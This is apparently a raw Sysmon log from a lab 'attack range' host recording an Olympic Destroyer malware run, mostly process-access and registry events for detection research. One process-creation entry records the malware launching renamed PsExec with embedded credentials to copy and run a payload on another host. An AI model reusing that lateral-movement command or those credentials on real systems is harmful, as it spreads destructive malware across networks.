10:57:03.047{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E205-000000003802}4764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.047{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FF-6216-E205-000000003802}4764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.032{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.032{C8EA50B7-12FF-6216-E205-000000003802}47646880C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.016{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-E105-000000003802}6948C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.016{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-E105-000000003802}6948C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:03.015{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FF-6216-E205-000000003802}4764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.995{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FF-6216-E205-000000003802}4764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.995{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.995{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.995{C8EA50B7-12FE-6216-E105-000000003802}69486864C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-DE05-000000003802}7132C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.979{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.979{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-E105-000000003802}6948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.963{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-E105-000000003802}6948C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.963{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.963{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.963{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.963{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.947{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-E005-000000003802}6800C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.947{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12FE-6216-E005-000000003802}6800C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.932{C8EA50B7-12FE-6216-E005-000000003802}68001892C:\Windows\system32\conhost.exe{C8EA50B7-12FE-6216-DD05-000000003802}6760C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.916{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-E005-000000003802}6800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.916{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-E005-000000003802}6800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.863{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.863{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.871{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.863{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FE-6216-DF05-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.863{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.848{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:02.848{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:02.848{C8EA50B7-12FE-6216-DB05-000000003802}6464C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 